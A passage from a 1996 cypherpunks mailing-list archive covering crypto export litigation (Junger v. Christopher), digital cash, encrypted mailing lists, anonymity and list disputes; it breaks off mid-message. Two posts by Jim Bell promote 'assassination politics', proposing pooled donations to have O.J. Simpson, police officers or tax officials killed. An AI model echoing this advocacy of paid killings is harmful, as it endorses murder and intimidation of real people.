>>  deals with your data; each profession is governed by a code of ethics,
>>  written or implicit. Moreover these limits are codified in law. If
>>  your accountant allowed your competitors to read the company books,
>>  you could take him to court.
>>
>>  Similarly, your Internet provider has an implicit duty to protect the
>>  privacy of your communication. Most professionals in my industry
>>  recognize this. I know most of the people working in Hungarian
>>  Internet and I doubt very much that they are reading your mail or
>>  mine. But they don't know where they stand in the eyes of the law.
>>
>>  Internet professionals should certainly assist the police in a
>>  legitimate investigation. But should every Internet user in Esztergom
>>  be investigated just because they could (theoretically) find
>>  bomb-making information on the Internet?
>>
>>  To hammer that point home a local Internet-based magazine has
>>  published, in Hungarian, complete bomb-making instructions:
>>  <http://www.idg.hu/internetto/cyber/special/dinamit.htm>. In other
>>  words, if you've read this far you may be the subject of a future
>>  investigation. Have a nice day!
>>
>>  ** Further Links:
>>
>>  The Electronic Frontier Foundation
>>  <http://www.eff.org>
>>  The International Electronic Rights Server
>>  <http://www.privacy.org>
>>  The Electronic Privacy Information Center
>>  <http://www.epic.org>
>>
>>  ----------------------------------------------------
>>  Copyright (c) 1996. Permission granted to redistribute this article in
>>  electronic form for non-profit purposes only. My byline and this message
>>  must remain intact. Contact me <steve@isys.hu> for reprint rights.
>>-----------------------------------------------------
>>
>>
>>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Wed, 2 Oct 1996 06:31:26 +0800
To: cypherpunks@toad.com
Subject: [ADVICE] Dimitri Vilus`s personal attacks
Message-ID: <844193560.12762.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> Hmm...never heard that one before.  Care to produce
> a reference?
> 
> (Or am I supposed to be ignoring this guy when he
> makes ridiculous claims?)

I shouldn`t take any notice, he`s a loon who posts rants, lies, off 
topic rubbish and personal attacks to the mailing list. just ignore 
him, hopefully he`ll soon realise he`s not wanted and leave...

 
 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 1 Oct 1996 09:28:17 +0800
To: cypherpunks@toad.com
Subject: e$: NSA Fluffy FUD?
Message-ID: <v03007805ae75ea596e18@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----BY SAFEMAIL-----

I just got off the phone with a reporter who was interviewing me for a
comment in the paper on Cybercash's "CyberCoin" mini-money protocol. My
comment was that I hadn't paid much attention to it, because I figured it
was yet another book-entry system, but, since he e-mailed me ahead of
time, I went to look at their FAQ on the web, and, yup, sure enough, it
was yet another book-entry system. :-). For the record, I have no problems
with Cybercash, themselves. If anyone's going to do a book-entry system,
it might as well be Cybercash.

What? What about CyberCoin? Oh. Yeah. CyberCoin. Well, the best way I can
figure, it's a transaction accumulator for either your credit card or
debit card, like First Virtual does for small transactions, only it
settles way much quicker, like less than 90 days. :-). On the privacy
standpoint, it hides transactions from the merchant, which is cool, but
not from the bank, which is not cool. What do you expect from a book-entry
system?  ;-). Cybercash at least makes no claims for anonymity, unlike
other transaction systems who will remain nameless...

Cybercash is at <http://cybercash.com> if you want more details.


Almost as an afterthought, the reporter said that someone at the NSA had
cranked out a for-public report, which he had just gotten a fax of,
decrying the succeptability of digital bearer certificate issuers in
general, digital cash issuers in particular, to rubber-hose attacks on
their private keys. The "Print off a trillion dollars in digimarks, buddy,
or we'll kill 'Fluffy', your cat, here..." scenario. Maybe we can call it
a Fluffy-the-cat attack...

The first time I heard of this old chestnut, of course, was from the lips
of Nathaniel Borenstein, who was pushing First Virtual rather strenously
at the time, as a solution to that problem, among others, up to, but not
including, dandruff and world peace.  This was before he invented the
keyboard sniffer, so I was actually listening to him, in those days. :-).

Now it seems the NSA has picked up the Nathaniel's fumbled ball and is
running with it for all they're worth.

Of course, the best way to deal with this from a technical standpoint is
not technically, of course, but with a market model: one with lots of
issuers, trustees, protocol designers, software developers, buyers and
sellers, in one great big robust, happy, many-to-many competitive
clusterfuck of digital commerce. Not to mention, of course, expiry dates
on the digital bearer certificates itself.


Anyway, has anyone *else* seen this apocryphal NSA paper yet? Is it on the
web? I'm sure (he said, volunteering someone else's services unasked yet
again) that someone like John Young would be interested in seeing that
fax...


So, the reporter asks, do I think that Citicorp should get into the
business of issuing digital cash?

Well, I guess not. Not according to the NSA, anyway, especially if John
Reed has a cat named 'Fluffy'.

Cheers,
Bob Hettinga

-----BEGIN PGP SIGNATURE-----BY SAFEMAIL-----
Version: 1.0b3

iQCVAwUBMlBBLfgyLN8bw6ZVAQENFQP9HKP1TdH27b7e2oruWFK1uc/aALOWPPUy
jU+zCS+xUgYwdTlFiI2+6xD/jiylU9Twf6rgX63NQ3JNl1rQhmVW8wIhArgbakkg
3/zxWeMJ+Bc/1N0t+XsHdB3MQ07HygaPyjKED73Exy2uO60XuY8Je2isM4fr2B4d
85OeDCb606Q=
=61Gj
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Max Sanchez" <azmax@hotmail.com>
Date: Tue, 1 Oct 1996 15:28:58 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <96Sep30.221407pdt.1608394(2)@constitution.hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


mail me back!


---------------------------------------------------------
Get Your *Web-Based* Free Email at http://www.hotmail.com
---------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cybergod@nfx.net
Date: Tue, 1 Oct 1996 10:07:06 +0800
To: cypherpunks@toad.com
Subject: Unsubscribing
Message-ID: <1.5.4.16.19960930185337.3d375a62@nfx.net>
MIME-Version: 1.0
Content-Type: text/plain


How do I unscribe?  Thank you ver much..

PGP Encrypted Messages Perfered:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzJQQgQAAAEEAOqOH/P/h9xWHxUb0309CWY1094F+HE+/medDnYA8jNJ+I1m
obwHXAiCtwRGy3skXVs3rjZDGMINZMcCSA4N+TCUMspvvB6qX8EwJMzRPduj2eHV
vHlVYGr42kOb41UH37sFWAd1ppPXVyvV4qNfRG5+tnzoXLRFlOD0x6ZUXpDxAAUR
tCNSdXNzZWxsIFMuIEFsYmVlIDxjeWJlcmdvZEBuZngubmV0Pg==
=hNsw
-----END PGP PUBLIC KEY BLOCK-----
PGP Encrypted Messages Perfered:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzJQQgQAAAEEAOqOH/P/h9xWHxUb0309CWY1094F+HE+/medDnYA8jNJ+I1m
obwHXAiCtwRGy3skXVs3rjZDGMINZMcCSA4N+TCUMspvvB6qX8EwJMzRPduj2eHV
vHlVYGr42kOb41UH37sFWAd1ppPXVyvV4qNfRG5+tnzoXLRFlOD0x6ZUXpDxAAUR
tCNSdXNzZWxsIFMuIEFsYmVlIDxjeWJlcmdvZEBuZngubmV0Pg==
=hNsw
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: travel23@juno.com (The Traveler)
Date: Tue, 1 Oct 1996 12:35:07 +0800
To: cypherpunks@toad.com
Subject: Re: Katz on cypherpunks, in HotWired's Media Rant
Message-ID: <19960930.191626.3558.0.travel23@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Declan McCullagh  wrote:
>
>[Background: the cypherpunk/pw:cypherpunk account used for HotWired's
>Threads discussion section has been used for anonymous flaming and
>attacks. --Declan]
>                          
>HotWired
>The Netizen
>30 Sep 96
>                                          
>     Cypherpunks don't want real confrontations or discussions, or they
>   would reveal their identities and make it possible to respond, as
most
>    flamers do. They are among media's rarest and at the same time most
>                  easily recognized subspecies: nihilists.
   

  Well, this really advances the cause for anonymous emailing.  It's even
more upsetting that, because one knucklehead used cypherpunks as his name
and pw,  his empty-headed rants become associated with the list and the
concept.
  <Of course, to be fair,  I have to leave open the possiblility that the
writer has read the likes of John Anon.'s and Dr.Dimitri Vulis'  unique
and ever-so-assine postings.>
   The primary point, however, is that right of privacy regarding
anonymous email is being submerged by idiots who use it to stroke their
miniscule egos.  Look at how many remailers have gone under because of
abuse - or, better yet, look at Georgia's new law regarding the use of
nyms.
   Tied in with the right to privacy is the right of free speech.  The
problem is that the general public, with few exceptions, understand
this.  Most, I believe, would support the right to privacy;  however, if
they encounter anonymous flaming - especially if it is politically
incorrect/profane/abusive, then we would hear the call for an immediate
end to the right to privacy and a demand for the hanging of anonymity at
high noon.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Wed, 2 Oct 1996 12:50:44 +0800
To: Cypherpunks <amend1-l@uasfsysb.uark.edu
Subject: Press Release
Message-ID: <199609302322.TAA21233@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain




 
			    Press Release


    Plaintiff Seeks Summary Judgment in Cleveland Case Challenging
	Licensing of ``Exports'' of Cryptographic Information

   Government Argues That Law Professor Cannot Challenge Regulation
    Requiring Him to Get Permission Before Teaching and Publishing
	     Because He Did Not Apply for That Permission

Oral Argument in Junger v. Christopher Set for Wednesday, November 20


	      Cleveland, Ohio, Tuesday, October 1, 1996
			For Immediate Release


		    For More Information Contact:

		    Raymond Vasvari (216) 522-1925
		    Gino Scarselli (216) 291-8601

	Or see URL:  http://samsara.law.cwru.edu/comp_law/jvc/


Cleveland, Ohio, Oct. 1 -- Lawyers for Professor Peter D. Junger today
filed a brief and a motion for summary judgment in Junger v.
Christopher, the case challenging the licensing of the communication of
``cryptograhic software'' that is pending before Judge Donald C. Nugent
in the Federal District Court here.

Junger seeks an injunction against the enforcement of provisions of
the International Traffic in Arms Regulations that require him to get
the permission of the State Department's Office of Defense Trade
Controls (the "ODTC") before he can communicate information about
cryptographic software to foreign persons, ``whether in the United
States or abroad.''  The penalty for failing to get such permission
before disclosing the information can be as great as a fine of one
million dollars and imprisonment for ten years.  These provisions
effectively prevent Junger from admitting foreign students to the
course that he teaches about Computers and the Law at Case Western
Reserve Law School in Cleveland, Ohio, and keep him from publishing
his course materials and articles containing cryptographic software,
or explaining what it does, how and where to get it, and how to use
it.

The challenged licensing scheme threatens the long-run viability of
the United States software industry and, according to a blue-ribbon
panel of the National Research Council, already costs that industry at
least ``a few hundred million dollars per year ..., and all
indications are that this figure will only grow in the future.''  The
regulations have been extensively criticized by industry and bills to
repeal or limit them are now pending in Congress.  

Junger's legal challenge is not based, however, on the economic damage
that the ITAR's cryptographic licensing scheme imposes on the software
industry and the nation's economy, but rather on the unconstitutional
restraints that it imposes on anyone who wants to speak or write
publically about any computer program that has, in the words of the
ITAR, the ``capability of maintaining secrecy or confidentiality of
information or information systems.''  Junger does not challenge the
constitutionality of requiring one to get a license before exporting a
physical cryptographic device: ``It isn't unconstitutional for the
Office of Defense Trade Controls to damage the computer industry and
our economy by requiring export licenses for cryptographic hardware,
but information about cryptographic software is, as the National
Research Council has pointed out, `pure knowledge that can be
transported over national borders inside the heads of people or via
letter.' Requiring the permission of the government before one can
communicate knowledge is unconstitutional.  Such a prior restraint is,
in fact, the paradigmatic example of a violation of the First
Amendment.''


    THE GOVERNMENT ARGUES THAT PLAINTIFF MUST APPLY FOR PERMISSION
	   TO SPEAK BEFORE HE CAN CHALLENGE THE REQUIREMENT
		  THAT HE APPLY FOR SUCH PERMISSION

In motions and briefs submitted August 21st, the government has asked
the court to dismiss the lawsuit, or in the alternative, to grant the
government judgment prior to trial.

The government makes the initial argument that Junger lacks standing
to claim that the provisions of the ITAR requiring him to get a formal
license or other permission from the ODTC before he publically
communicates information about cryptographic software, including the
contents of the software itself, are unconstitutional.  And it also
argues that that claim is neither ``ripe'' nor ``colorable'', because
Junger has not applied to the ODTC for such permission.

Junger takes the position that as a law teacher who venerates the
First Amendment it would be as improper for him to request the federal
censors for permission to speak and publish as it would be for him
openly violate the law.  As he puts it: ``My duty is to challenge
these unconstitutional regulations, not to give in to them nor to
violate them in an act of civil disobedience.''  His lawyers point out
in their briefs that few propositions of constitutional law are better
established than the rule that a plaintiff does not have to submit to
an unconstitutional restraint on speech and on the press before
challenging it in court.

``Those arguments by the government are rather strange,'' says Gino
J. Scarselli, one of Junger's lawyers, ``they seem to be based on
their argument that cryptographic software is actually hardware
because it is functional.''  And then he adds, ``Of course, that
argument is also rather strange.''


       THE GOVERNMENT ARGUES THAT SOME OF THE MATERIAL AT ISSUE
		       IS EXEMPT UNDER THE ITAR

The government also contends that some of the information at issue may
be exempt from the ITAR's licensing requirements as technical data
that is in the ``public domain'' because it is available to the public
through ``fundamental research in science and engineering'' or through
``sales at newsstands and bookstores.''

``That hardly is a defense,'' says Scarselli, ``since it is quite
clear that the government will not concede that all of the information
that Professor Junger wants to be able publish and discuss is in the
public domain.  And to make matters worse, the only way that Professor
Junger can actually find out whether the government will treat
particular information as being exempt from the formal licensing
requirements is to apply to the ODTC for it calls a Commodity
Jurisdiction Determination, which in reality is just another form of
license.''

``It is not as if I am engaged in fundamental research in science and
engineering.'' Junger adds.  ``What I want to publish and discuss has
to do with the political and legal issues that are raised by computer
technology, including, of course, cryptography.  

``For just one example, since lawyers have a legal and ethical duty to
protect the confidences of their clients, I am convinced that lawyers
who use electronic mail or other computer technologies to communicate
with their clients, or to store information supplied by their clients,
are in some circumstances ethically, and perhaps even legally,
required to use cryptography to maintain the confidentiality of that
information.  And yet I cannot publically explain to law students and
lawyers--and lawyers cannot publically explain to their clients--how
to obtain and use effective cryptographic software without first
getting the government's permission to disclose that information.
And, of course, if the cryptographic software really is effective,
then there is little or no chance that the government will permit its
disclosure.''


	  THE GOVERNMENT ARGUES THAT CRYPTOGRAPHIC SOFTWARE
	       IS NOT PROTECTED BY THE FIRST AMENDMENT
		       BECAUSE IT IS FUNCTIONAL

There is no law in the United States that forbids or regulates the use
of cryptography.  Yet the government argues that the information in
texts containing cryptographic software, including recipes for
creating such software, can be used in a computer to preserve secrecy
and confidentiality, and concludes that cryptographic software is
``conduct'' and ``functional'' and is thus not a text that is
constitutionally protected as speech.

Junger's lawyers, on the other hand, say that his claims do not relate
to the conduct of running a cryptographic program on a
computer--conduct that is not regulated by the ITAR, after all--and
that he only challenges the restraints that the ITAR impose on the
communication of information about how to carry on such legal conduct.

``Expressive conduct is exactly what is protected by the First
Amendment,'' says Raymond Vasvari, another of Junger's lawyers.  ``And
if that expression were not functional, if it were not effective,
there would be no need to protect it.  The government's argument turns
two hundred years of First Amendment jurisprudence on its head.''

``The government's arguments about software being conduct and
functional are striking examples of the sort of confusion that
pervades the whole area of Computers and the Law,'' Junger says.
``Trying to clear up such confusion is my major goal in my course in
Computers and the Law.  In fact, when I started teaching that course
in 1993, I wrote some cryptographic software to assist my students in
grasping the distinction between software as a text that can be
communicated, and that is protected by copyright law and the First
Amendment, and software as a process that runs in a computer's central
processor that can be protected by patents, but not by copyrights.  If
it weren't so frustrating, it would almost be funny that I cannot
publish that software because of the prior restraints imposed by the
defendants' interpretation of the ITAR, even though it is perfectly
legal for me, or for any one else, including `foreign persons,' to
actually run such software on a computer.  The government's confusion
is so extensive that an agent of the ODTC has actually told me that
software, cryptographic software, is actually hardware.''

``It is quite clear to me,'' Junger adds, ``that the State Department
and the National Security Agency and other elements in the executive
branch of the government are attempting to restrain the communication
of information about cryptographic software not only abroad, but also
within the United States, because they do not want us actually to be
able to use cryptography to preserve the privacy of our thoughts and
our communications.  It is as if the government required one to get a
license before explaining how to make or use an envelope, even though
it did not forbid the use of envelopes themselves.  After all, all
that cryptographic software is is a way of making electronic
envelopes.''

		       ORAL ARGUMENT SCHEDULED

Junger v. Christopher has been placed on a fast track by Judge Nugent.
On September 5 he established a briefing schedule: the plaintiff's
brief was due and was filed today and the government's response is due
on Friday, October 18.

Oral argument is scheduled for Wednesday, November 20.

Judge Nugent's decision is expected before the first of the year.


		     BACKGROUND ON THE LITIGATION

Litigation is expensive.  Professor Junger and his volunteer lawyers
were only able to bring the suit because of a generous gift by an
anonymous donor of $5,000 that was used to create the ITAR Legal
Attack Fund.  Additional donations by Professor Junger and others have
increased that fund to more than seven thousand dollars.

Scarselli and Vasvari are lawyers in private practice in Cleveland who
have dedicated much of their professional lives to the protection of
First Amendment freedoms.  The third lawyer on the team is Kevin
O'Neill, a law professor at Cleveland State University and the former
legal director of the Ohio Chapter of the American Civil Liberties
Union.

				--30--

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu
		     URL:  http://samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 1 Oct 1996 13:27:42 +0800
To: "Chris Adams" <cypherpunks@toad.com>
Subject: Re: Internet plug pulled on Colombia's guerrillas
Message-ID: <199610010257.TAA18377@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:04 AM 9/30/96, Chris Adams wrote:
>On Fri, 27 Sep 1996 14:33:42 -0800, jim bell wrote:

>>>The Communist insurgents, who rose up in arms in 1964,
>>>embraced new technology last year in their fight to overthrow the
>>>government by launching a home page on the Internet. 
>>
>>I couldn't resist smiling when I read this.  Not that I want their access 
>>cut; quite the opposite.  But it is REALLY reassuring to see the authorities 
>>behave in exactly the fashion you expect them to!  Attempting to cut off 
>>dissenting political voices IRL is de rigeur; now, this shows that they 
>>believe "threat" to the government posed by allowing others to voice 
>>contrary opinions on the 'net is real.
>
>It's particularly funny when you consider that the main justification for
>suppression is that insurgents (or rebels or freedom fighters or ...) kill
>people. Something along the lines of "We don't suppress unpopular views;
>we're just protecting our citizens".   Now, it seems to me that that having a
>web page is a decidely non-lethal thing. <g>

For now, it is!


>OTOH, it's probably more
>effective at getting the outside world to find out what's happening.  Draw
>your own conclusions.

Yes, if anything we should want these people to be able to communicate 
whenever they want.  It would probably deter inappropriate violence, and 
further it would put pressure on the government to fix whatever problems 
legitimately need fixing.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Tue, 1 Oct 1996 12:10:34 +0800
To: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Encrypted lists and ease of use
In-Reply-To: <01IA3FDVFUWO8Y57AQ@mbcl.rutgers.edu>
Message-ID: <roger20fjbiwk.fsf@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


<scs@lokkur.dexter.mi.us> wrote:

  > Recently I've been involved in a number of small (30 people or
  > less) mailing lists which occasionally use PGP for encrypted mail.

  > The hassle comes when one is encrypting a message to the list...

Well, let the list server keep track of who is subscribed.

  > What I propose to do is have a second list, list-encrypted@host,
  > for every list@host...

Why do you need two lists?  My server currently hosts a few such lists
(for non-profit international technical projects, extended family
news, etc.):

Subscribers send mail to the list server, PGP-encrypted with the
list's public key.  The list server decrypts each inbound message with
its private key (passphrase entered at reboot).  The message may be a
message to the list, or a command to the list server.

The list server maintains a list of subscribers' public keys and
encrypts each list message (or digest, for higher-volume lists) for
each subscriber (our lists are small, so we prefer to encrypt mail for
one subscriber at a time).

Although messages exist temporarily as plain text arrays in the list
server, it doesn't maintain an archive of messages.  And as with any
(semi-)secure server, physical security is an issue.

As Allen mentioned, I think PGPdomo handles this, but majordomo is
pretty easy to hack up for any variation on this theme...

-- 
Roger Williams                         finger me for my PGP public key
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Simmons <scs@lokkur.dexter.mi.us>
Date: Tue, 1 Oct 1996 11:26:40 +0800
To: cypherpunks@toad.com
Subject: Re: Encrypted lists and ease of use
In-Reply-To: <roger20fjbiwk.fsf@sturgeon.coelacanth.com>
Message-ID: <199610010016.UAA17469@lokkur.dexter.mi.us>
MIME-Version: 1.0
Content-Type: text/plain


>Why do you need two lists?  My server currently hosts a few such lists
>(for non-profit international technical projects, extended family
>news, etc.) . . .

Your solution is exactly what I want to do with the -encrypted list.  The
reason we want two is that 80-90% of what goes across the list is not
sensitive.  That kind of thing we want in plaintext for nice tools like
grep and glimpse.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: yjkim@ssrnet.snu.ac.kr (Kim Yoonjeong)
Date: Mon, 30 Sep 1996 22:04:26 +0800
To: cypherpunks@toad.com
Subject: the key of DES
Message-ID: <199609301017.UAA04791@ssrnet.snu.ac.kr>
MIME-Version: 1.0
Content-Type: text/plain


Hello, all !
With given a unknown DES system with 64 bits plaintext p, ciphertext c,
can there be MORE THAN ONE keys ? 
If so, How is the probability (big or small)? 

	Sincerely, 
	 - Yoonejong 

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Yoonjeong Kim 				Email: yjkim@ssrnet.snu.ac.kr
 Department of Computer Engineering	Phone: +82-2-875-7726 (office)
 Seoul National University		       +82-2-872-9801 (home)	
 Seoul 151-742 Korea			Fax:   +82-2-875-7726
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 1 Oct 1996 13:38:04 +0800
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: active practice in America
Message-ID: <199610010319.UAA19992@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:45 AM 9/30/96 -0800, Timothy C. May wrote:

>(Legal purists will point out that the second trial was for "Federal civil
>rights violations." Harummphh. What would the Founders think of this logic:
>"First we try them on ordinary criminal charges. If they are found Not
>Guilty, we charge them in the next higher court with more abstract charges.
>If they are still found found Not Guilty, we hit them with "civil rights"
>and "being disrespectful to women" charges. And if that doesn't work, we
>charge them in the World Court. We've only had one guilty party get past
>them, and for that guy we appealed to the Pope and he put a Papal Hex on
>the guy and ordered him burned in oil.")
>
>Double jeapardy means the system gets one shot at proving charges, not two
>or three.
>
>(And, yes, even though I am sure O.J. Simpson killed those two people, I am
>not happy with what appears to be a _second_ trial. For sure, it's a
>_civil_ trial, for damages, but to this layman it looks like a second trial
>on the main charges. I suppose I always thought that being found "Not
>Guilty" on the act itself made it essentially impossible for a civil trial
>to redecide the same issue. Boy, was I wrong.)

As usual, I have a solution to this problem!   (AP, for the relatively 
unitiated out there.)

If people really believe OJ is guilty, just pool your shekels and see him 
dead.   Or, if you believe the cops planted evidence, buy THEIR deaths via 
donation. (No cop would have dared risk AP to jump the wall...particularly 
if by doing so he risked having the evidence thrown out due to illegality.  
Nor would they have risked trying to frame an innocent person, or at least 
one believed innocent by a few million citizens.)  Or do both.  And so on...

Notice, however, that if AP were operational, a lot might have turned out 
differently.  First, if you assume that OJ is guilty, he would have KNOWN 
that he would be the first person suspected if Nicole were murdered.  This 
would have been an enormous deterrent, because he would have known that he'd 
be a potential target even if he managed to commit the "perfect crime" and 
leave no evidence.

However, it's even a bit more complicated that this.  Anyone considering an 
AP donation against OJ would have to realize that he KNEW all this, and 
might have been appropriately deterred, and if Nicole was killed anyway it's 
quite possible it WASN'T OJ.

Sure, thinking about this can give anyone a headache.  That's because AP 
can't answer the question, "Is OJ guilty," but it could dramatically change 
the circumstances in which such questions are answered.  


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 1 Oct 1996 14:08:30 +0800
To: "E. Allen Smith" <cypherpunks@toad.com
Subject: Re: [NEWS] More internet-tax proposals
Message-ID: <199610010347.UAA22294@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:08 PM 9/30/96 EDT, E. Allen Smith wrote:
>>     INTERNET BEWARE: GOVERNMENTS ARE SMELLING A RICH NEW SOURCE OF TAXES
>>      Copyright &copy 1996 Nando.net
>>      Copyright &copy 1996 The Boston Globe
>>   So Netcom contacted state tax officials for clarification. Netcom's
>>   500,000 customers are scattered throughout the United States, but the
>>   company is focusing on tax laws in Massachusetts and 14 other states
>>   where most of its customers dwell. Weatherford said he still had
>>   received no official word from Massachusetts, but Netcom attorneys had
>>   concluded the company is subject to the state's telecommunication
>>   sales tax. To play it safe, it will begin collecting the tax this
>>   month.
>
>	Remind me not to sign up with Netcom.
>   
>>   It's probably a smart move. At the Massachusetts Department of
>>   Revenue, acting general counsel William Hazel told the Globe that
>>   Netcom and every other on-line service provider should be paying the
>>   sales tax.
>   
>>   "To the extent that folks are being charged for the ability to
>>   telecommunicate through the Internet... that's taxable," he said.

Obligatory AP solution:

If Netcom and every other telecommunications company doing business in 
Massachusetts were to pool their money, say a half a year of their normal 
payments, they could (in effect) buy an "AP Insurance Policy" which would 
guarantee that they wouldn't have to pay the tax...forever.

Since Netcom is a known entity, all they'd have to do is to announce 
publicly that they are not going to pay the tax because they don't believe 
they owe it, but that they are going to allocate a certain proportion of its 
gross receipts into a fund to disable the tax collection...by "other 
means"...if it was ever tried.  This would have to be a rather powerful 
deterrent to any state attorney considering opening up this can of worms.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 1 Oct 1996 14:12:33 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: Mailmasher
Message-ID: <199610010403.VAA04509@dfw-ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:29 AM 9/30/96 -0400, Robert Hettinga <rah@shipwright.com> wrote:
> http://www.mailmasher.com/

Interesting (potentially; the Anonymizer isn't currently listening to me,
and I'm not going to set up an account non-anonymized there.
The operator nicely provides an Anonymized URL for getting there.)
SSL is down, ostensibly for performance reasons.

The mail system says it's basically pseudonymous - there's a privacy policy
which says he doesn't log what accounts belong to whom.
If the government wants to use subpoenas or warrants to seize his logs,
the operator won't stop them, but the log files will be disappointing...

The IP address is in space that appears to be hotwired.com Class C space.
Poking around whois was interesting.....

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 1 Oct 1996 14:09:47 +0800
To: cypherpunks@toad.com
Subject: Anonymous: Re: Phoenix News
Message-ID: <199610010137.VAA23410@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Anyone else get one of these things in their mailbox?

------- Forwarded Message

Date: Mon, 30 Sep 1996 01:04:21 +0200 (MET DST)
Message-Id: <199609292304.BAA11993@basement.replay.com>
Subject: Re: Phoenix News
Content-Type: TEXT/PLAIN; charset=US-ASCII
To: perry@piermont.com
From: nobody@REPLAY.COM (Anonymous)
Organization: Replay and Company UnLimited
XComm: Replay may or may not approve of the content of this posting
XComm: Report misuse of this automated service to <abuse@replay.com>

Perry Metzger,

You will find in your inbox, maybe you already have, a
posting made by me.  I am the President and CEO of IPG.
Included therein is my resume and various other explanatory
materials. We are now in the position of being able to prove
what we have only been able to contend up to now, I realize
that probably do not believe that, but it is true
nonetheless. I have personally dealt with thousands of OTPs
during the last 40 years, and our product produces a
legitimate true OTP, pure and simple.

In those materials, you will also find an attack made on you
and Bill Stewart. That attack is in retaliation to the snide
remarks, and your highly stilted subjective opinions, and
attacks that you and Bill have made on me and IPG in the
past.

I do not object to criticism,  when I am wrong, but I do
object to using just highly subjective opinions to attack me,
or anyone for that matter.

I do not know about you, but I have more important things to
do with my time than to engage in a ''war of words,'' with
you and Bill. However, if you wound me, as you have
repeatedly in the past, by such tactics, I will fight back
furiously to the best of my abilities.

I think it a terrible waste of your talents to engage in such
conduct, and mine too of course.

I do not expect either of you to agree with me unless you
know me to be in the right. Either, or both of you, can
criticize me all you want as long as such criticism is
objective and based on facts.

I seek a truce - and am willing to apologize publicly, if we
can agree that we will not engage in personal subjective
attacks on each other. The ball is in your court, I seek
peace and a more productive usage of my time and will only
respond in you lash out and try to wound me further.

Appreciatively,

Donald, ''Ralph'', Wood.

"Civility in all human matters is the best indicator of
intelligence!"

                              - Aristotle




------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P. J. Ponder" <ponder@freenet.tlh.fl.us>
Date: Tue, 1 Oct 1996 12:34:22 +0800
To: cypherpunks@toad.com
Subject: Re: GPS
Message-ID: <Pine.OSF.3.91.960930215131.14545A-100000@fn3.freenet.tlh.fl.us>
MIME-Version: 1.0
Content-Type: text/plain


The National [US] Academy of Sciences has a new web spot called 'Beyond 
Discovery' and one of the articles posted is about the Global Positioning 
System.  You may observe same at: http://www2.nas.edu/bsi/20fe.html

Oops:
I just learned the name 'John Anonymous MacDonald' gets stuck on mail that
